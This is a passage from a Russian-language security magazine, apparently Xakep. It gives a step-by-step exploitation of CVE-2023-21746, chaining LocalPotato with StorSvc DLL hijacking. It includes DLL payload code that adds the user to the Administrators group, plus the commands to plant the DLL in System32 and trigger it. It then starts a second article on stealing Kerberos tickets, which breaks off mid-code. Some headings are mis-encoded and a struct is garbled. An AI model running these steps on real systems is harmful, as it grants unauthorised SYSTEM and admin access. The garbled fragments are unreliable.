безопасности А для привилегированного соединения, но не будет отправлять его сразу. Хакер запустит свой клиент, чтобы он одновременно с локальным инициировал соединение с сервером. Легитимный клиент отправляет сообщение, чтобы инициировать соединение, а сервер в ответ пошлет сообщение с идентификатором нового контекста безопасности Б. 3. Злоумышленник также запускает свой сервер и меняет идентификаторы контекстов обоих соединений таким образом, чтобы привилегированный процесс получил контекст соединения с сервером злоумышленника, а не со своим собственным. В результате хакер сможет получить доступ к любому сетевому ресурсу с привилегиями SYSTEM.

STORSVC È DLL HIJACKING До сих пор мы использовали LocalPotato для записи любых файлов на целевую машину. Чтобы получить привилегированную оболочку, нам нужно выяснить, как использовать произвольную запись для выполнения команды. Недавно был обнаружен еще один вектор повышения привилегий, когда злоумышленник мог перехватить отсутствующую DLL для выполнения произвольных команд с привилегиями SYSTEM. Единственная проблема этого вектора заключалась в том, что для его запуска злоумышленнику необходимо было записать DLL в системную переменную PATH. По умолчанию в PATH Windows включаются только те каталоги, в которые могут писать лишь привилегированные учетные записи. Хотя можно найти машины, на которых установка определенных приложений изменила переменную PATH и сделала машину уязвимой, вектор атаки применим только к конкретным сценариям. Комбинирование данной атаки с LocalPotato позволяет преодолеть это ограничение и получить полностью рабочий эксплоит для повышения привилегий. Как выяснила компания BlackArrow, злоумышленник может отправить RPCвызов методу SvcRebootToFlashingMode, предоставляемому службой StorSvc, что, в свою очередь, приведет к попытке загрузки отсутствующей DLL под названием SprintCSP.dll.

Если ты незнаком с RPC, то считай, что это API, который раскрывает функции для удаленного использования. В описанном случае служба StorSvc раскрывает метод SvcRebootToFlashingMode, который может вызвать любой человек, имеющий доступ к машине. Поскольку StorSvc работает с привилегиями SYSTEM, создание SprintCSP.dll где-нибудь в PATH приведет к загрузке библиотеки при каждом вызове SvcRebootToFlashingMode. ÊÎÌÏÈËßÖÈß ÝÊÑÏËÎÈÒÀ Теперь, когда мы знаем всю теоретическую базу, мы можем приступить к выполнению практической части. Все необходимое для дальнейших действий можно найти в репозитории на GitHub. Чтобы воспользоваться эксплоитом CVE-2023-21746, сначала надо скомпилировать два файла: • SprintCSP.dll. Это недостающая DLL, которую мы собираемся перехватить. Код по умолчанию, поставляемый с эксплоитом, выполняет команду whoami и выводит ответ в C:\Program Data\whoamiall.txt. Нам нужно изменить команду, чтобы достигнуть нашей цели; • RpcClient.exe. Эта программа запустит RPC-вызов SvcRebootToFlashingMode. В зависимости от версии Windows, на которую нацелен эксплоит, его код может потребоваться немного подправить, поскольку в разных версиях Windows используются разные идентификаторы интерфейсов для раскрытия SvcRebootToFlashingMode. Для начала разберемся с файлом RpcClient.exe. Как уже говорилось, нам потребуется изменить эксплоит в зависимости от версии Windows на целевой машине. Для этого нужно отредактировать первые строки файла C:\tools\ LPE via StorSvc\RpcClient\RpcClient\storsvc_c.c так, чтобы выбиралась нужная операционная система. Поскольку моя машина работает под управлением Windows Server 2019, я отредактирую файл следующим образом.

Это настроит эксплоит на использование корректного идентификатора интерфейса RPC для моей версии Windows. Теперь, когда код исправлен, скомпилируем необходимые нам инструменты.

Перед компиляцией SprintCSP.dll нам нужно изменить функцию DoStuff() в файле SprintCSP\main.c таким образом, чтобы она добавляла нашего текущего пользователя в группу Administrators. Вот код с нашей замененной командой: void DoStuff() { // Replace all this code by your payload STARTUPINFO si = { sizeof(STARTUPINFO) }; PROCESS_INFORMATION pi; CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\ Windows", &si, &pi); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return; }

Теперь скомпилируем нашу DLL.

ÝÊÑÏËÓÀÒÀÖÈß Для начала удостоверимся, что наш пользователь действительно не входит в группу локальных администраторов.

Для успешной эксплуатации StorSvc необходимо скопировать SprintCSP. dll в любую директорию текущей PATH. Проверить PATH можно, выполнив следующую команду: reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\ Environment" -v Path

Мы будем использовать каталог %SystemRoot%\system32, который расширяется до C:\windows\system32. Однако ты можешь использовать любой из этих двух каталогов. Теперь, когда все готово, можем запустить LocalPotato: LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll

DLL успешно записалась в System32! Теперь мы можем запустить RpcClient.exe для запуска вызова SvcRebootToFlashingMode, выполнив полезную нагрузку в нашей DLL.

Чтобы удостовериться, что эксплоит сработал, проверим, находится ли наш пользователь в группе администраторов.

ÂÛÂÎÄ После успешного срабатывания эксплоита мы можем выполнить любые действия от лица администратора под учетной записью пользователя user. Например, запустить командную строку.

Оптимальная защита от эксплуатации этой уязвимости (как и других подобных) — своевременно устанавливать обновления безопасности Microsoft. Тем не менее даже в этом случае некоторые протоколы, использующие NTLM в качестве метода аутентификации, могут быть уязвимы для подобных атак.

COVERSTORY

Есть разные способы злоупотреблять сессией пользователя на устройстве: кража учетных данных, манипуляции с токенами и другие. Но знаешь ли ты, что можно сымитировать получение TGT-билета пользователем через совершенно легитимные функции Windows?

MichelleVermishelle @Michaelzhm [email protected]

Статья имеет ознакомительный характер и предназначена для специалистов по безопасности, проводящих тестирование в рамках контракта. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

В этом году появилось несколько новых способов из такого разряда. Наиболее интересные — WTSImpersonator и GIUDA. Последний позволяет получать тикеты залогиненного пользователя, даже не зная его пароля! Давай разберемся, как это работает, а параллельно напишем реализацию на C++, которую я назвал TGSThief. LOGON SESSION При входе пользователя в Windows появляется сессия пользователя, которая хранит все данные о нем. Для каждого нового пользователя создается новая сессия. Например, если на компьютере одновременно работают два пользователя, то будет две сессии.

Как выглядят Logon Sessions Каждая сессия определяется с помощью LUID (locally unique identier). Из названия понятно, что LUID уникален для каждой сессии. Информация хранится в виде одноименной структуры. typedef ULONG LONG } LUID,

struct _LUID { LowPart; HighPart; *PLUID;

Сам LUID представлен в виде двух значений: ULONG и LONG. Причем обычно заполняется лишь поле LowPart, а HighPart имеет значение 0. Эта структура используется во всех функциях WinAPI, которые так или иначе связаны с сессиями пользователя. С помощью GetTokenInformation() можно получить LUID пользователя. Для этого функции следует передать токен процесса, запущенного от имени текущего пользователя. #include #include #include int main() { HANDLE tokenHandle; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, & tokenHandle)) { std::cerr